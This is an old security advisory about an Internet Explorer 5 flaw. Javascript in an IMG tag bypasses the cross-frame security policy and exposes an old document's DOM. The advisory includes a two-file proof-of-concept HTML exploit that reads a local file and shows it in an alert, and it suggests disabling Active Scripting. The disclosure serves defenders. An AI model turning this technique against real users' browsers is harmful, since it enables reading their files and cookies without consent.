COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE5
PROBLEM
Georgi Guninski found following. Internet Explorer 5.01 under
Windows 95 and 5.5 under WinNT 4.0 (suppose other versions are
also vulnerable) allows circumventing "Cross frame security
policy" by accessing the DOM of "old" documents using
<IMG SRC="javascript:...">
and a design flaw in IE. This exposes the whole DOM of the target
document and opens lots of security risks. This allows reading
local files, reading files from any host, window spoofing, getting
cookies, etc.
This is a strange exploit. If you open a new document in a window
that contains an old document, the old document's DOM may be
accessed by the new document until the new document is completely
parsed and displayed. Looks like IE keeps the old document until
the new document is finally parsed and displayed. If you put a:
<IMG SRC="javascript:...">
in the new document, it has access to the old document's DOM.
Examine the source code for more info. The code is:
-----------------img2main.html-------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and
shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
-------------------------------------------------------------
----------------img2.html------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your
file: \'+opener.document.body.innerText)');alert('Just an alert, but
is necessary. Wait a little.')">
</HTML>
-------------------------------------------------------------
Demonstration is available at:
http://www.nat.bg/~joro/img2main.html
SOLUTION
Workaround: Disable Active Scripting